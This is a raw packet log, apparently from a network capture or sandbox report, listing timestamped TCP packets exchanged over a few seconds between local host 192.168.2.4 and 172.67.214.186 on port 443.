                                                                                                                                          Dec 25, 2024 22:17:38.776483059 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776514053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.776535034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776571035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.779855967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.779870033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.779988050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.779998064 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.780093908 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.783217907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783231974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783287048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.783296108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783339977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.787533045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787548065 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787625074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.787632942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787723064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.790847063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.790862083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.790945053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.790954113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.791057110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795116901 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795130968 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795202971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795202971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795212030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795264006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.798971891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.798986912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.799029112 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.799036980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.799069881 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.799088955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802469015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802489996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802552938 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802561045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802609921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802625895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.968725920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.968741894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.968831062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.968846083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.969002962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.972168922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972184896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972285032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.972295046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972450972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.975586891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.975600004 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.975672007 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.975681067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.975769043 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.979815006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.979829073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.979914904 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.979923964 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.979974985 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.983222961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.983237982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.983303070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.983310938 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.983359098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.987436056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.987451077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.987508059 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.987514973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.987570047 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.991333961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.991349936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.991436005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.991445065 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.991489887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.994787931 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.994801998 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.994874954 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.994874954 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.994884014 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.995054960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.161078930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.161099911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.161187887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.161201000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.161243916 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.164573908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.164589882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.164690971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.164700985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.164747000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.168685913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.168700933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.168788910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.168797016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.168849945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.172158957 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.172175884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.172296047 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.172303915 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.172358036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.175543070 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.175556898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.175631046 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.175640106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.175719976 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.179773092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.179788113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.179856062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.179864883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.179994106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.183676958 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.183691978 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.183770895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.183779001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.183826923 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.187154055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.187170029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.187272072 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.187279940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.187341928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.207140923 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.353120089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.353137016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.353236914 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.353250027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.353295088 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.357340097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.357357025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.357420921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.357429981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.357470036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.360702991 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.360716105 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.360781908 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.360790968 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.360831976 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.364870071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.364885092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.364960909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.364969015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.365015030 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.368329048 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.368346930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.368401051 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.368410110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.368454933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.372474909 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.372488022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.372545958 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.372554064 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.372596025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.375807047 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.375823021 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.375890970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.375899076 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.375942945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.379914045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.379930019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.380000114 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.380007982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.380048037 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.432066917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.545722961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.545739889 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.545818090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.545829058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.545870066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.549166918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.549180984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.549237013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.549245119 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.549285889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.550403118 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.553359985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.553375006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.553452969 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.553462029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.553500891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.556859016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.556874037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.556936026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.556945086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.556992054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.560967922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.560981989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.561038971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.561048031 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.561086893 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.564409971 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.564424992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.564496040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.564505100 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.564549923 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.568449974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.568465948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.568531036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.568540096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.568582058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.571799040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.571813107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.571883917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.571892023 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.571939945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.663837910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.738061905 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.738081932 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.738121986 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.738132000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.738147020 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.738171101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.741472006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.741487026 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.741528034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.741537094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.741561890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.741580009 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.745616913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.745637894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.745697021 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.745706081 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.745738029 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.745760918 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.749111891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.749126911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.749181032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.749190092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.749222994 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.749234915 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.753248930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753266096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753338099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.753346920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753400087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756732941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756747007 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756793976 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756802082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756815910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756845951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.760669947 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760685921 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760756016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.760762930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760807037 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.764069080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764089108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764147997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.764158010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764202118 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.778445959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.930471897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930495024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930586100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.930598021 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930646896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.933900118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.933916092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.933975935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.933984041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.934030056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.938049078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938062906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938121080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.938131094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938174963 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.941529989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941545963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941606998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.941616058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941658974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.945700884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945718050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945794106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.945802927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945846081 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.949156046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949171066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949220896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.949229956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949275970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.953104973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953119993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953192949 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.953202009 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953243971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.956547976 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956562042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956619978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.956628084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956671000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.122874975 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.122893095 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.122961998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.122973919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.123029947 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.126230001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126249075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126321077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.126329899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126374960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.130439043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130451918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130557060 CET49744443192.168.2.4172.67.214.186
